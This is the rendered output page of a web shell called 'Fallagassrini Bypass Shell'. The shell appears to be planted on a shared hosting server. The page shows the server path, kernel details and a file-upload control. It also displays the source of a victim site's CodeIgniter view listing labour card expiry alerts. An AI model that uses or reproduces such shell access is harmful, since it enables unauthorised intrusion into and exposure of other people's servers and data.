? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/eldertree/application/views/home/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/eldertree/application/views/home/labor_card_expiry_alerts.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
?>

<?php
$this->load->view('commonjsfiles');
?>

<script>
    scrollToElement($('#dashboard_alert_div'));
    function scrollToElement(ele) {
        $(window).scrollTop(ele.offset().top).scrollLeft(ele.offset().left);
    }
    function close_alert(emp_id,row_id,alert_date)
    {
        if (confirm("Are you sure you want to remove the alert?"))
        {
            $.ajax({
                type: "POST",
                url: "<?= site_url() ?>"+'/settings/alert_close/'+emp_id+"/labour_expiry/"+alert_date,
                success: function(msg)
                {
                    $('#'+row_id) .hide();
                }
            });
        }
    }

</script>

<!-- BEGIN PAGE LEVEL STYLES --> 

<!-- END PAGE LEVEL STYLES -->
<div class="row-fluid">
    <div class="tab-pane " id="tab_2">
        <div class="portlet box yellow">
            <div class="portlet-title">
                <div class="caption"><i class="icon-reorder"></i>Labour Card Expiry Alerts</div>
                <div class="tools">
                    <a href="#" onclick="view_page('home','alert','dashboard_alert_div')" class="remove"></a>
                </div>
            </div>
            <div class="portlet-body form">
                <!-- BEGIN FORM-->
               
             
                <table id="table-example" class="table table-striped table-hover table-bordered">
                <thead>
                    <tr>
                        <th>SL NO</th>
                        <th>Employee No</th>
                        <th>Employee Name</th>
                        <th>Expiry Date</th>
                        <th>Remove</th>
                    </tr><thead>
                </thead>
                <tbody>
                    <?php
                    $check3 = $this->mastermodel->labour_expiry();
                    $i = 0;

                    foreach ($check3 as $list) {
                        $i++;
                        ?>
                        <tr id='laber_alert_<?= $i ?>'>
                            <td><?= $i ?></td>
                            <td><?= $list['employee_no'] ?></td>
                            <td><?= $list['employee_name'] ?></td>
                            <td><?= $this->mastermodel->convertdatenormalformat($list['employee_labour_card_expiry_date']) ?></td>
                            
                            <td>
                            <img style="float: right; vertical-align: top;"src="<?= base_url() ?>assets/img/close.png" alt="Delete Row" class="delRow clickimage" onclick="close_alert(<?= $list['employee_id'] ?>,'laber_alert_<?= $i ?>','<?=$list['employee_labour_card_expiry_date']?>')" title="Delete Row"/>
                            </td>
                        </tr>
                        <?php
                    }
                    ?>                
                </tbody>
            </table>
    

                <!-- END FORM-->                
            </div>
        </div>
    </div>
</div>




































bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net